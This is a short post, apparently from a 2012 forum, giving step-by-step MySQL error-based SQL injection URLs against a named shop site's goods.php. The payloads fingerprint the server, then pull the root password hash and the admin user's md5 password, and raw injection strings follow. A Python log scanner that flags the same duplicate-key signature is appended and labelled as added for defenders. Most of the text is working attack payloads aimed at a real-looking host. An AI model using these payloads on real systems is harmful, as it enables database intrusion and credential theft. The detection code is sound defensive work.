Blind injection in detail
Posted on 2012-9-5 14:59:30
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The user_name column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The password column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Obtain the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
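Every payload on this page relies on the same MySQL duplicate-key trick: count(*) over a concat(...) of the wanted value with floor(rand()*2), grouped by that alias, so the leaked value surfaces in the error message. As an added defender-side example (not part of the original post), the Python below decodes request parameters from access-log lines and flags requests carrying that four-token signature; the log lines, IPs and timestamps are constructed, and one of them reuses the goods.php payload shown above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signature of the MySQL error-based (duplicate-key) technique used in the
# payloads above: count(*) + concat(...) + floor(rand()*2) + group by.
# Matching runs on URL-decoded, whitespace-normalized parameter values, so
# %20, '+', mixed case and rand(0)/rand() variants are all caught.
_TOKENS = (
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"group\s+by", re.I),
    re.compile(r"concat(?:_ws)?\s*\(", re.I),
)

# Constructed combined-format access-log lines (placeholder IPs/timestamps);
# lines 2 and 3 carry the technique, lines 1 and 4 are benign look-alikes.
SAMPLE_LOG = [
    '198.51.100.20 - - [05/Sep/2012:14:58:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 312',
    '203.0.113.9 - - [05/Sep/2012:15:00:12 +0800] "GET /goods.php?id=1+AND+(1,1)>(SELECT+COUNT(*),CONCAT(@@version,0x3a,FLOOR(RAND(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)%23 HTTP/1.1" 500 312',
    '198.51.100.7 - - [05/Sep/2012:15:01:02 +0800] "GET /search.php?q=group+by+floor+plans+count HTTP/1.1" 200 2048',
]

_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decoded_params(url: str) -> str:
    """Return all decoded parameter values of a request URL, joined by single spaces."""
    values = [v for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return re.sub(r"\s+", " ", " ".join(values))


def is_error_based_sqli(url: str) -> bool:
    """True when every signature token occurs in the decoded parameters."""
    text = decoded_params(url)
    return all(tok.search(text) for tok in _TOKENS)


def scan_access_log(lines):
    """Return (client_ip, request_path) for each log line whose request matches."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m and is_error_based_sqli(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for ip, path in scan_access_log(SAMPLE_LOG):
        print(f"error-based SQLi signature from {ip}: {path[:60]}...")
```

Requiring all four tokens keeps ordinary "group by" or "count" search terms from firing, while decoding first defeats the %20 / '+' / case variations between the URL payloads and the raw SQL forms on this page.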